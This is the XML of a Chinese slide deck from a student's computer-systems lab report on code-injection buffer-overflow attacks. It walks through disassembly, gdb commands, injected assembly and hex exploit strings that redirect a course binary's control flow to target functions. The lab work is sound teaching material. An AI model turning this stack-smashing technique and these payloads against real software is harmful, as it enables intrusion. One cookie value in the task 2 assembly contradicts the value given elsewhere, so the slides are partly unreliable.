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49" r:id="rId4"/>
    <p:sldId id="279" r:id="rId5"/>
    <p:sldId id="482" r:id="rId6"/>
    <p:sldId id="489" r:id="rId7"/>
    <p:sldId id="483" r:id="rId8"/>
    <p:sldId id="491" r:id="rId9"/>
    <p:sldId id="492" r:id="rId10"/>
    <p:sldId id="490" r:id="rId11"/>
    <p:sldId id="493" r:id="rId12"/>
    <p:sldId id="494" r:id="rId13"/>
    <p:sldId id="495" r:id="rId14"/>
    <p:sldId id="496" r:id="rId15"/>
    <p:sldId id="497" r:id="rId16"/>
    <p:sldId id="48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980" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="398" y="336"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="913"/>
        <p:guide pos="3782"/>
        <p:guide pos="7129"/>
        <p:guide pos="488"/>
        <p:guide orient="horz" pos="2297"/>
        <p:guide orient="horz" pos="4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601-3535-4314-BC97-A9FF5BD07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E28-2493-46BD-B513-F4E5D7EEAF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6670" y="2143086"/>
            <a:ext cx="561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7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计算机系统基础</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" spc="7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3113" y="1080114"/>
            <a:ext cx="958532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lab4-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代码注入攻击实验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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  <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636670" y="2850972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汇报人：石云天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38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782597" y="664764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任务</a:t>
            </a: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11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607026" y="4228523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5" name="Graphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485023" y="1546135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9203" y="1448815"/>
            <a:ext cx="4832782" cy="25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任务描述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在这次任务中，需要注入少量代码，利用缓冲区溢出漏洞，实现程序控制流的重定向至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函数，并进入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分支。在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包含一个参数，输入一个字符串，通过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hexmatch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对字符串进行比对，满足条件则进入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分支；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46766" y="4177758"/>
            <a:ext cx="4579576" cy="106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任务求解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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty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disctarget.txt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文件中查找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函数所对应的反汇编代码，所得结果见下图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9" y="1147497"/>
            <a:ext cx="5141317" cy="467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5237" y="945493"/>
            <a:ext cx="4409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在该段反汇编代码中，由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401911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401916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401936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行可以看出若想跳转到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分支，应先调用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hexmatch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函数，检查其返回值，当其为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时，才能跳转至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分支，接下来研究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hexmatch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函数的反汇编代码，见下图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7" y="2902430"/>
            <a:ext cx="4409835" cy="352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516648" y="903841"/>
            <a:ext cx="567535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为便于理解，将其中片段转化为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代码如下：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648" y="1455920"/>
            <a:ext cx="6096000" cy="2487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hexmatch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(unsigned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val,char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*a){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char b[100];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char *s = b + random()%100;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sprintf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(s,"%.8x",val);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re =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strncmp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(a,s,9);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return re;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3943717"/>
            <a:ext cx="5807242" cy="2484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从中发现：只有当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时才能返回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，即等于字符串“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59b997fa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”时返回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，从而顺利跳转至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分支完成任务。因此通过观察上述代码，发现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hexmatch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函数首先开辟了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字节的栈帧用于存储变量，但是其忽略了对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的定义，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存放地址随机，在函数运行过程中，此地址会被其他函数所覆盖，故可以在此处进行攻击。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239" y="834189"/>
            <a:ext cx="4507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我们需要将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的数据放在其他不会被占用的地方，在反汇编代码中，在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函数后有一段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代码，且其在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函数中都没有进行调用，较为安全，因此可以推测此处即为任务希望我们存放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数据的地方，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反汇编代码见下图：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6" y="2988594"/>
            <a:ext cx="449704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360317" y="834189"/>
            <a:ext cx="4973053" cy="248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因此我们接下来需要寻找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的地址，所用指令如下：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ctarget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 b *0x40196c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 r -q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 p/s $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rsp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所得结果见下图：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17" y="3314996"/>
            <a:ext cx="522465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360317" y="5031206"/>
            <a:ext cx="5224657" cy="144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从上图可知：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0x5561dca8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，因此可以将寄存器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的地址移动到寄存器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中，然后将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函数的首地址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(0x4018fa)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压入函数栈中。因此新建文档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text1.s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，写入汇编代码如下：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18144" y="753979"/>
            <a:ext cx="4022184" cy="421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movq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$0x5561dca8, %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rdi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寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="100" dirty="0" err="1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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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的地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x5561dca8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pushq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$0x4018fa  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由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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touch3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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函数反汇编代码可知其首地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800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0x4018fa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接下来利用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命令将其编译为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文件，并利用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工具进行反编译，所用指令如下：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gcc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-c text1.s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objdump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-d text1.o &gt; text1.d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所得结果见下图：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4" y="4969685"/>
            <a:ext cx="4307655" cy="113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245715" y="753979"/>
            <a:ext cx="5128141" cy="525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由任务二可知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0x5561dc78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，因此我们需要将字符串“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59b997fa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”传入其中，上述字符串对应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码为：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35 39 62 39 39 37 66 61 00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（末尾有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）。至此可以得到任务三的答案，其由三部分构成：首先是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gutbuf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个字节，前面部分把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的地址传入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中，随后将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函数的首地址压入函数栈中，后面部分无实际作用，可以补充为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；其次是溢出后返回到寄存器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的地址；最后是输入的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字符串。（注意：每次读取八个字节，第一部分为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个字节，满足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的整数倍，但第二部分只有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个字节，因此需要在后面补充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，使其满足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的整数倍的要求）。完成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ans3.txt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的编辑后输入指令：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4837" y="6008431"/>
            <a:ext cx="6096000" cy="410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./hex2raw &lt; ans3.txt | ./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ctarget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-q</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1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7026" y="2533230"/>
            <a:ext cx="2277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得到结果如下图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6" y="3196048"/>
            <a:ext cx="4679297" cy="128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raphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645208" y="170545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91479" y="1705451"/>
            <a:ext cx="359349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任务答案：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c7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c7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100" dirty="0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a8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dc 61 55 68 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fa 18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kern="100" dirty="0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 00 c3 00 00 00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78 dc 61 55 00 00 00 00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35 39 62 39 39 37 66 61</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C4591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展示结束 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="60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  <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665886" y="3117849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汇报人：石云天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2329" y="1969411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谢谢各位老师</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="60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  <a:cs typeface="Aharoni" panose="02010803020104030203" pitchFamily="2" charset="-79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39687" y="1596503"/>
            <a:ext cx="1853392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zh-CN" altLang="en-US" sz="28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任务一</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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9687" y="2898306"/>
            <a:ext cx="1888659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任务二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9794" y="4200109"/>
            <a:ext cx="1853392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任务三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700">
        <p15:prstTrans prst="pageCurlDoubl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2597" y="664764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任务一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8" name="Graphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492484" y="2820447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840408" y="61430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838426" y="61645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2" name="Graphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492484" y="1635896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6664" y="1538576"/>
            <a:ext cx="4832782" cy="127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任务描述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利用缓冲区溢出漏洞，实现程序控制流的重定向，使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函数返回时，不返回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函数，而是直接跳转到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touch1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224" y="2769682"/>
            <a:ext cx="4579576" cy="106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任务求解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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty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disctarget.txt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文件中查找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函数所对应的反汇编代码，所得结果见下图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87689" y="1276966"/>
            <a:ext cx="4579576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在该段反汇编代码中，由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4017a8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4017b9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行中可以看出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函数使用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0x28=40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个字节的空间，随后直接返回。因此我们需要先输入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个字节（全为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即可），随后输入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函数的地址，便可完成任务。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函数对应的反汇编代码见下图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16" y="3960344"/>
            <a:ext cx="5088726" cy="18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50" y="3529307"/>
            <a:ext cx="4714609" cy="157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36" name="Graphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645208" y="2119275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91479" y="2051700"/>
            <a:ext cx="359349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任务答案：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 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c0 17 40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7026" y="1191991"/>
            <a:ext cx="457957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从中可以看出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函数的起始地址为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0x4017c0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，因此我们需要在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最后加上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c01740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（地址按小端排序所得结果，或直接利用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编译也可得到该结果），完成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ans1.txt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的编辑后输入指令：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./hex2raw &lt; ans1.txt | ./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ctarget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-q</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1800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得到结果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9" y="3676583"/>
            <a:ext cx="4946370" cy="137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39687" y="1596503"/>
            <a:ext cx="1853392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任务一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9687" y="2898306"/>
            <a:ext cx="1888659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zh-CN" altLang="en-US" sz="28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任务二</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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9794" y="4200109"/>
            <a:ext cx="1853392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任务三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700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38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782597" y="664764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任务二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11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470727" y="3064142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5" name="Graphic 11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485023" y="1546135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9203" y="1448815"/>
            <a:ext cx="4832782" cy="1837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任务描述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在这次任务中，需要注入少量代码，利用缓冲区溢出漏洞，实现程序控制流的重定向至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函数，并进入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分支；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910467" y="3013377"/>
            <a:ext cx="4579576" cy="106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accent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任务求解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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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disctarget.txt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文件中查找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函数所对应的反汇编代码，所得结果见下图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78" y="4172691"/>
            <a:ext cx="5267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文本框 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470017" y="1448815"/>
            <a:ext cx="5104566" cy="4561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在该段反汇编代码中，由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4017fc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40181d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行中可以看出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函数将其函数值与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&lt;cookie&gt;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进行比较，若两者相等，便会顺序执行到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validate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分支，即实现任务二的目标。因此我们需要将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&lt;cookie&gt;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的值传入到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函数中，即传入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函数使用的寄存器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cookie.txt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文件中可查询到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&lt;cookie&gt;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0x59b997fa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。但我们无法将其直接写入其中，需要将汇编语言转化为机器码后再传入。因此任务二的整体思路为：利用汇编语言将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&lt;cookie&gt;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的值传入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中，随后执行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函数（将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函数地址压入函数栈中），最后返回。因此建立文档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text.s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，写入汇编代码如下：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9554" y="770728"/>
            <a:ext cx="5576446" cy="179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movq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$0x50b997fa, %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rdi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endParaRPr lang="en-US" altLang="zh-CN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#&lt;cookie&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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0x50b997fa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pushq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$0x4017ec  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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touch2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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函数反汇编代码可知其首地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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0x4017ec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554" y="2566028"/>
            <a:ext cx="50853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接下来利用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命令将其编译为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文件，并利用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工具进行反编译，所用指令如下：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gcc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-c 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text.s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objdump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-d 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text.o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&gt; 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text.d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所得结果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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898452" y="4576762"/>
            <a:ext cx="4327549" cy="113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587101" y="770728"/>
            <a:ext cx="5309937" cy="3527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但若想知道将这段机器码存放在哪里，便要了解寄存器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的地址，在其栈顶进行注入。由于没有进行栈随机化，因此在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函数中（由于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函数使用了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个字节，故在栈减去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字节后的地址，即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0x4017ac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处）设置一个断点，然后查看寄存器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的地址即可，所用指令如下：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ctarget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 b *0x4017ac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 r -q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gdb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 p/x $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rsp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87689" y="4392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所得结果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2" y="4855164"/>
            <a:ext cx="5309936" cy="171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2850155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01 任务一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1985" y="230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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务二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6844" y="195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03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任务三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840328" y="94509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38672" y="94508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1770" y="867258"/>
            <a:ext cx="4656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从上图中可得寄存器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0x5561dc78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。至此可以得到任务二的答案，其由两部分构成：首先是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个字节，在这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个字节中，前面部分将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&lt;cookie&gt;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的值传入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函数，后面部分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接下来是溢出后返回到寄存器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ans2.txt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的编辑后输入指令：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./hex2raw &lt; ans2.txt | ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-q</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" kern="10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得到结果如下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6" y="4178178"/>
            <a:ext cx="4656769" cy="181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11+++" descr="蜂鸟 纯色填充"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7730464" y="2119275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76735" y="2051700"/>
            <a:ext cx="359349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任务答案：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6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kern="100" dirty="0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c7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="100" dirty="0" err="1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c7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fa 97 b9 59 68 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kern="100" dirty="0" err="1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ec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17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kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C4591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 00 c3 00 00 00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C4591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00 00 00 00 00 00 00 00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kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C4591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78 dc 61 55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39687" y="1596503"/>
            <a:ext cx="1853392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01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任务一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9687" y="2898306"/>
            <a:ext cx="1888659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02 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任务二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9794" y="4200109"/>
            <a:ext cx="1853392" cy="829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03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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任务三</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1B4F8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700">
        <p15:prstTrans prst="pageCurlDouble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COMMONDATA" val="eyJoZGlkIjoiNTNmNzExOWYxYmU5N2JjNTRhZTkwYmViMjdmMGMyYWMifQ=="/>
  <p:tag name="KSO_WPP_MARK_KEY" val="ff0573ca-d64b-48d9-8c51-107ca9fdb56d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3830</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>239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思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Microsoft Yi Baiti</vt:lpstr>
      <vt:lpstr>Aharoni</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>思源黑体 CN Regular</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Yu Gothic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 LGZH</dc:creator>
  <cp:lastModifiedBy>WPS_1601727230</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-26T13:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-17T04:19:14Z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872F5D78EC08493FB58300A02C530EF6</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.12763</vt:lpwstr>
  </property>
</Properties>
</file>